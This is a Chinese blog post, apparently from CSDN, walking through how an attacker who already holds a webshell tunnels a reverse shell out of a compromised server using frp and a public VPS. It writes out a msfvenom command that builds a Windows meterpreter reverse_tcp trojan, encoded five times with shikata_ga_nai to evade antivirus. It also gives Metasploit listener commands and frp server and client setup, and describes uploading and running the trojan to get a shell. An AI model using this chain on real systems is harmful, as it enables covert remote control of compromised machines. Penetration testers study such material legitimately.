frp隧道(流量代理)

最新推荐文章于 2023-12-10 16:31:00 发布
最新推荐文章于 2023-12-10 16:31:00 发布
阅读量922 收藏 2
点赞数 6
文章标签: 网络 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58954236/article/details/133823274
版权

代理

代理使用场景

  1. 拿下远程web服务器
  2. webshell连接不稳定,需要使用稳定的木马程序
  3. 远程服务器无法直接连接攻击者电脑(内网IP)
  4. 需要借助公网vps转发来自失陷服务器的木马流量
  5. 借助frp服务器(vps)和客户端(内网攻击者)建立隧道
  6. 当vps某一个端口收到流量的时候,frps会根据提前和frpc约定好的规则,使用建立好的隧道转发流量

前提条件

攻击者:

  • 拿下了一台webshell权限
  • 需要上传完整功能的木马
  • 生成一个木马,不管谁执行了这个木马,都会连接vps的4444端口发送流量

代理过程

image-20231013203408275

隧道

失陷主机或服务器:

  • 在执行攻击者上传的木马时主动与vps进行连接
  • 请求与vps的4444端口进行通信,发送流量

公网vps:

  • 攻击者可控
  • 攻击者和受害服务器都可以访问
  • vps使用7000端口(frp软件)进行监听,攻击者向vps发出请求建立隧道(只能由攻击者向vps发出请求,因为公网IP不能访问私网IP)
  • 失陷主机运行木马后,失陷主机将信息通过4444端口传送至vps,vps把自己的4444端口的流量通过7000端口转发给攻击者

frp服务

frp存在客户端和服务端,frp服务运行起来后服务端会自行开放7000端口。

  • 内网kali用户上配置frpc客户端

  • vps7.7.7.7上配置frps服务端

  • frps和frpc做好链接后内网IP和vps7.7.7.7就建立了一个隧道

  • frp服务(vps)的4444端口会主动转发(通过7000端口)给客户端设定接收流量的端口

内网IP查看能否与外网通信

image-20231013202952351

image-20231013202942155

MSF木马生成

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.9.75.223 LPORT=4444 -e x86/shikata_ga_nai -f exe -o shell.exe -i 5

解释:

这是一个使用Metasploit框架中的msfvenom工具生成恶意软件的命令。

  • -p :指定Payload(有效负载:木马的功能点)为Windows Meterpreter反向TCP连接。Meterpreter是Metasploit框架中一个功能强大的远程访问工具。
  • LHOST:设置本地监听IP地址为10.9.75.223。这是恶意软件将连接到的主机IP地址。
  • LPORT:设置本地监听端口号为4444。这是恶意软件将连接到的主机端口号。
  • -e :使用x86/shikata_ga_nai编码来混淆Payload,以避免被基于特征的防病毒软件检测。
  • -f :设置生成的恶意软件文件格式为可执行文件(exe)。
  • -o :指定生成的恶意软件文件名为shell.exe。
  • -i :设置编码迭代次数为5,以增加避免被检测的难度。

木马上传至失陷主机

image-20231013210028793

image-20231013210045558

监听

1、启动msf :msfconsole
2、载入监控模块  :use exploit/multi/handler
3、加载payload:
set payload windows/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 4444
run

image-20231013211002873

image-20231013211044543

image-20231013211350995

kali主机启动监听等待木马连接

失陷主机运行木马后将流量数据包发送给vps的4444端口,但是vps没有开放4444端口

image-20231013211818294

vps开启frp服务:

frp服务端

image-20231013212051157

查看frp服务端的配置文件,当启动frp服务端的时候默认开启7000端口和客户端连接。向客户端发流量数据包。

image-20231013212401559

在frps.exe所在文件打开cmd

frps.exe -c frps.ini	#启动frp服务器

image-20231013212818486

frp客户端:

解压frp客户端压缩包

tar xf frp_0.33.0_linux_amd64.tar.gz

image-20231013213128458

进入frp_0.33.0_linux_amd64目录查看客户端配置信息

cd frp_0.33.0_linux_amd64
ls
sudo vim frpc.ini

image-20231013214823409

启动frp客户端(frpc)

sudo ./frpc -c frpc.ini		#启动客户端

image-20231013215101685

image-20231013215649015

运行木马

失陷主机运行木马

image-20231013220215872

image-20231013220244608

打开生成木马界面获得shell

image-20231013220330963

image-20231013220424012

网安咸鱼1517
关注
  • 6
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
frp搭建内网流量转发
ithongchou的博客
05-25 255
外网服务器linux内网客户端Windows 10。
frp内网穿透(socks隧道)
最新发布
2301_76227305的博客
03-06 3325
在实验过程中还是遇到了挺多的问题,但好在大多都解决了。不过还是遗留了一些不懂的问题,等以后再慢慢研究了。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
FRP内网穿透
weixin_43047908的博客
07-08 1761
目录内网穿透FRP介绍FRP实现原理 内网穿透 内网穿透,也即 NAT 穿透,进行 NAT 穿透是为了使具有某一个特定源 IP 地址和源端口号的数据包不被 NAT 设备屏蔽而正确路由到内网主机。 我们的物理机、服务器可能处于路由器后或者处于内网之中。如果我们想直接访问到这些设备(远程桌面、远程文件、SSH等等),一般来说要通过一些转发或者P2P(端到端)组网软件的帮助。 其实,对于FRP穿透工具来说,它和端口转发有所不同,端口转发是只会进行单个端口的流量转发,但是这在渗透中往往是不行的,我们通过通过FRP
frp的使用
热门推荐
GB的博客
09-05 1万+
  frp frp 是一个可用于内网穿透的高性能的反向代理应用,支持 tcp, udp, http, https 协议。 frp 的作用 利用处于内网或防火墙后的机器,对外网环境提供 http 或 https 服务。 对于 http, https 服务支持基于域名的虚拟主机,支持自定义域名绑定,使多个域名可以共用一个80端口。 利用处于内网或防火墙后的机器,对外网环境提供 tcp 和 ...
流量分析实战-反弹和通信
ArBitrarilyR的博客
12-05 616
攻击场景: 两台外连主机A和B,分别对内网主机C进行frp反弹执行命令与执行命令返回数据的接收 因为种种原因,当时没法写现在写出来的记忆比较模糊,到最后还是有很多的疑问没有解决 还有很多不确定没法佐证 首先接到项目同事发来的可疑ip,这个ip对我们的甲方进行了一系列攻击,并在特定时间平台爆出存在frp反弹的告警,需要我通过流量进行威胁狩猎,佐证是否攻击成功 通过科莱的回溯分析,首先在互联网区域进行回溯,查看此ip在互联网区域的行为 因为是在hw,所以红
内网渗透系列:内网隧道frp
闵行小鱼塘
04-09 2215
本文研究通过TCP和HTTP出网的一个工具,frp
内网流量流出1(frp端口转发)
xiao_he0123的博客
03-15 3816
内网流量流出1前言一、frp是什么二、准备前提三,操作步骤1.服务端配置(frp服务器端一般命名为frps,配置文件为frps.ini)2.客户端配置(客户端一般命名为frpc,配置文件为frpc.ini)在这里插入图片描述3.使用总结 前言 在进行渗透测试是经常会遇到目标在内网或者不能直接访问的情况,这时候就需要将我们的流量代理进目标内网 一、frp是什么 frp是一个可用于内网穿透的高性能的反向代理应用 支持TCP,udp协议,并尝试点对点的穿透 二、准备前提 (1)一台位于公网上的服务器(作为服务端
frp高性能反向代理window版本
10-26
frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。
FRP反向代理
11-13
使用FRP可以轻松将内网主机IP挂到外网上,有用的资源放在内网主机中,开通代理后通过代理端口轻松访问。FRP使用操作简单,时候入门使用
frp方向代理工具,可做端口映射使用
04-06
官方介绍:frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet. As of now, it supports TCP and UDP, as well as HTTP and HTTPS protocols, where ...
流量代理frp内网穿透工具包.zip
01-13
frp内网穿透的基础原理 现在来说frp项目的原理。这个项目分为两个部分,frps和frpc。S指server服务端的意思,c指client客户端的意思。服务端需要站在明处,所以frps我们把它部署在云服务器上,因为云服务器一班都是...
FRP高性能反向代理 Windows 64位
11-04
高性能的反向代理应用,支持 tcp, udp, http, https 协议。利用处于防火墙后的机器,对外网环境提供 http 或 https 服务。对于 http, https 服务支持基于域名的虚拟主机,支持自定义域名绑定,对外网环境提供 tcp 和...
【日常积累】使用frp进行内网穿透
margu_168的博客
08-16 1104
frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议,且支持 P2P 通信。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。
FRP内网代理
weixin_51151498的博客
07-23 1973
FRP内网代理
内网渗透代理转发详解及工具介绍
博客地址 www.sec0nd.top
08-16 3459
在进行渗透测试时,getshell打点之后就要进行内网渗透了,那么为了更方便的进行横向移动,需要做代理转发。今天来了解下代理转发以及相关的工具。代理有两种形式,映射和转发,最终的表现形式均为代理端口映射:外网主机A想访问内网主机B上的服务端口转发:外网主机A已经可以访问内网主机B里的任意端口,但是无法访问内网主机C上的端口,此时可以将C主机的端口转发到主机B端口,那么外网主机A访问了内网主机B就等于访问了内网主机C。就简单介绍几种工具,都是比较常用的。......
frp代理工具流量分析
热爱学习,喜欢折腾!
09-26 1368
frp主要由客户端(frpc)和服务端(frps)组成,服务端通常部署在具有公网 IP 的机器上,客户端通常部署在需要穿透的内网服务所在的机器上。内网服务由于没有公网IP,不能被非局域网内的其他用户访问。用户通过访问服务端的 frps,由 frp负责根据请求的端口或其他信息将请求路由到对应的内网机器,从而实现通信
内网渗透(二)——FRP隧道搭建
qq_61562251的博客
12-10 1308
配置好了,该电脑走到流量都是该公网服务器的,也就是说,无需火狐挂代理,也可以直接访问到内网服务器所能访问到的内容。在使用中,避免其他人随意连接和被钓鱼,最好把token、账号秘密、流量加密添加进去。socket代理:可以将整台电脑的流量都进行转发,不支持icmp协议。操作简单,所以使用的人较多,有特征。注意:linux和Windows的配置文件是不一样的。可以打开页面了,页面地址是本地页面所设置的监听端口下。点对点代理:只将这个端口的流量进行转发。攻击者电脑通过代理配置,一样可以访问。
使用FRP(快速反向代理)实现内网穿透——以腾讯云服务器为例
qq_44667259的博客
04-14 7255
FRP(fast reverse proxy,快速反向代理技术),通过frp的部署,可以实现从互联网访问局域网内的某主机,实现“内网穿透”。
frp sock5代理
09-08
对于使用 frp 进行 Socks5 代理,你需要进行以下步骤: 1. 首先,确保你已经安装了 frp 工具。你可以在 frp 的官方网站(https://github.com/fatedier/frp)上下载适合你操作系统的版本,并按照说明进行安装。 2. 在 frp 的配置文件中,你需要添加一个反向代理的配置项。打开 frp 的配置文件(通常为 `frps.ini` 或 `frps.conf`),找到 `[reverse_proxy]` 部分,如果没有则需要手动添加该部分。 3. 在 `[reverse_proxy]` 部分中,配置以下参数: - `type = tcp`:指定代理类型为 TCP。 - `remote_port = 1080`:指定远程端口,即 Socks5 代理的端口。 - `local_ip = 127.0.0.1`:指定本地 IP 地址,即 Socks5 代理的监听地址。 - `local_port = 1080`:指定本地端口,即 Socks5 代理的端口。 4. 保存并关闭配置文件。 5. 启动 frp 服务端。使用命令行或终端,进入 frp 的安装目录,并执行以下命令启动服务端: ``` ./frps -c frps.ini ``` 6. 在客户端机器上,安装并配置 Socks5 代理客户端软件。你可以选择使用浏览器插件或独立的 Socks5 客户端软件。在配置客户端时,使用 frp 服务端的公网 IP 地址和配置的远程端口。 7. 连接到 frp 的 Socks5 代理。启动客户端软件,并连接到 frp 提供的 Socks5 代理地址和端口。 通过以上步骤,你就可以使用 frp 搭建一个 Socks5 代理了。请注意,确保 frp 服务端和客户端的配置参数一致,并且防火墙规则允许相应的端口通信

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网安咸鱼1517

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值